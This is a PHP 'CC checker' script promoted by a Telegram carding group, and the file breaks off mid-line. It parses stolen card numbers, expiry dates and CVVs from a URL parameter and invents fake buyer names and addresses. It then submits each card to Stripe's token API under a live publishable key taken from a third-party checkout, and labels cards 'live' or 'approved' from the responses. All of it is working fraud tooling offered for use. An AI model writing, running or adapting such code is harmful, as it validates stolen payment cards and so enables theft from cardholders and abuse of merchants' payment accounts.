<?php


/// Made by ♛ ★ BINS 💳💰 ★ ♛
/// Join @hbins & @hbinsfamily for more...
/// This is raw api.. :)
/// Add ur Proxies in zeltproxy.txt


error_reporting(0);
set_time_limit(0);
error_reporting(0);
date_default_timezone_set('America/Buenos_Aires');


function multiexplode($delimiters, $string)
{
  $one = str_replace($delimiters, $delimiters[0], $string);
  $two = explode($delimiters[0], $one);
  return $two;
}
$lista = $_GET['lista'];
$cc = multiexplode(array(":", "|", ""), $lista)[0];
$mon = multiexplode(array(":", "|", ""), $lista)[1];
$year = multiexplode(array(":", "|", ""), $lista)[2];
$cvv = multiexplode(array(":", "|", ""), $lista)[3];

function GetStr($string, $start, $end)
{
  $str = explode($start, $string);
  $str = explode($end, $str[1]);
  return $str[0];
}
////////////////////////////===[Randomizing Details Api]

$first = str_shuffle("ZELTRAX");
$last = str_shuffle("ROCKZ");
$first1 = str_shuffle("zeltrax85246");
$email = "".$first1."%40gmail.com";
$address = "".rand(0000,9999)."+Main+Street";
$phone = rand(0000000000,9999999999);
$country = "US";
$st = array("AL","NY","CA","FL","WA");
$st1 = array_rand($st);
$state = $st[$st1];
if ($state == "NY"){
$zip = "10080";
$city = "New+York";
}
elseif ($state == "WA"){
$zip = "98001";
$city = "Auburn";
}
elseif ($state == "AL"){
$zip = "35005";
$city = "Adamsville";
}
elseif ($state == "FL"){
$zip = "32003";
$city = "Orange+Park";
}
else{
$zip = "90201";
$city = "Bell";
};
/////////////////////////////////////BIN LOOKUP START////////////////////////////////////////////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: lookup.binlist.net',
'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'
));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '');
$fim = curl_exec($ch);

$bank = getStr($fim, '"bank":{"name":"', '"');
$name = getStr($fim, '"name":"', '"');
$brand = getStr($fim, '"brand":"', '"');
$country = getStr($fim, '"country":{"name":"', '"');
$scheme = getStr($fim, '"scheme":"', '"');
$currency = getStr($fim, '"currency":"', '"');
$emoji = getStr($fim, '"emoji":"', '"');
$type = getStr($fim, '"type":"', '"');

 if(strpos($fim, '"type":"credit"') !== false) {
  $bin = 'Credito';
} else {
  $bin = 'Debito';
}
/////////////////////////////////////BIN LOOKUP END////////////////////////////////////////////////////////////////

//---------------------------------------------------------------------------------------------------------------------------------------------//

////////////////////////////////////===[For Authorizing Cards]////////////////////////////////////////////////////
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://api.stripe.com/v1/tokens');
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: api.stripe.com',
'Accept: application/json',
'Accept-Language: en-US',
'Content-Type: application/x-www-form-urlencoded',
'Origin: https://checkout.stripe.com',
'Referer: https://checkout.stripe.com/m/v3/index-08530579fdb5229c50cc57d0adf3263c.html?distinct_id=4c4b4e48-8ef2-3dcb-ac62-9b083dda5fd5'));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
//=============================================================================================================================================//
//=============================================================================================================================================//
curl_setopt($ch, CURLOPT_POSTFIELDS, 'email='.$email.'&validation_type=card&payment_user_agent=Stripe+Checkout+v3+checkout-manhattan+(stripe.js%2F8ab9a2f)&referrer=https%3A%2F%2Fwww.gimkit.com%2Fgift-cards&pasted_fields=number&card[number]='.$cc.'&card[exp_month]='.$mon.'&card[exp_year]='.$year.'&card[cvc]='.$cvv.'&card[name]='.$email.'&card[address_zip]='.$zip.'&time_on_page=29564&guid=a17c26f2-b434-435e-baa9-3d12c2447f25&muid=425d935e-8cf8-42b8-a316-49e243c66e44&sid=b5c5c0e8-cc45-4733-b77e-9fce5e87e3ba&key=pk_live_LKZ2v8hyMK4h50Hw4DqNsFIo');
//=============================================================================================================================================//
//=============================================================================================================================================//
$result = curl_exec($ch);
$monsage = trim(strip_tags(getStr($result,'"message":"','"')));
$info = curl_getinfo($ch);
$time = $info['total_time'];

////////////////////////////===[Card Response Start]///////////////////////////////////////////////////

if(strpos($result, '/donations/thank_you?donation_number=','' )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, '"cvc_check": "pass"')){
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = CVC Check Pass </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "Thank You For Donation." )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "Thank You." )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Donation is succeeded </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'"status": "succeeded"')){
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Succeeded </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card zip code is incorrect.' )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your card zip code is incorrect </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_zip" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Incorrect Zip </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "Your payment has already been processed")) {
  echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your payment has already been processed </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"The zip code you supplied failed validation.")){
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = The zip code you supplied failed validation </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "Success" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Success </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "succeeded." )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Succeeded </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'"type":"one-time"')){
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CVV</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = One Time </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card has insufficient funds.')) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live Card</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Insufficient Funds </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "insufficient_funds")) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live Card</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Insufficient Funds </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "lost_card" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Lost Card </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> 